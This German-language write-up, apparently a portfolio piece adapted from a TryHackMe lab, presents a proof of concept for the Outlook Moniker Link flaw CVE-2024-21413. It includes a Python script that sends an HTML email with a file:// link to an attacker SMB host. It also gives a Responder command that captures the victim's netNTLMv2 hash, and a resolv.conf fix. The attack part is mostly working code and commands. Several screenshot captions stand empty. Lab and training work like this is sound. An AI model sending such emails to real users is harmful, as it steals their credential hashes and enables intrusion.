
Proof-of-concept-Exploit für CVE-2024-21413 unter Verwendung von Moniker Link in HTML-E-Mails, um eine SMB-Verbindung auszulösen und netNTLMv2-Hashes über Responder zu erfassen. Demonstriert Fähigkeiten im Penetrationstest, Python-Scripting und Netzwerkprotokollanalyse.
Übersicht: Ein praktischer PoC, der die Verwendung eines Moniker Links in einer HTML-E-Mail demonstriert, um eine SMB-Verbindung von Outlook auszulösen, sodass der netNTLMv2-Hash eines Opfers über Responder erfasst werden kann. Dies zeigt praktische Fähigkeiten in Penetrationstests, Skripterstellung und Netzwerkprotokollanalyse.
file://) zu liefern, der auf die SMB-Freigabe des Angreifers verweist.# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124' # THM SMTP server
password = input('Enter attacker email password: ')
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'
msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))
with smtplib.SMTP(mailserver, 25) as s:
s.ehlo()
s.login(sender, password)
s.sendmail(sender, [receiver], msg.as_string())
print('Email delivered')
Tipp: Ersetzen Sie ATTACKER_IP und mailserver vor der Ausführung. Im TryHackMe-Labor lautet das Passwort attacker.
responder -I ens5
Ersetzen Sie ens5 durch Ihren Netzwerkschnittstellennamen.
/etc/resolv.confManchmal schlägt Responder aufgrund defekter Symlinks in /etc/resolv.conf fehl. Behebung mit:
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
Hervorgehobene Fähigkeiten: Linux-Fehlerbehebung, DNS-Konfiguration und Anpassung von Tools an Cloud-/VM-Umgebungen.
Fehler / Resolv.conf-Problem:`

DNS-Fix angewendet:

Python-E-Mail-Skript:

Exploit-Zustellung:

Opfer-Posteingang:

Erfasster Opfer-Hash:

Adaptiert vom TryHackMe MonikerLink-Labor und originalem PoC von CMNatic (GitHub)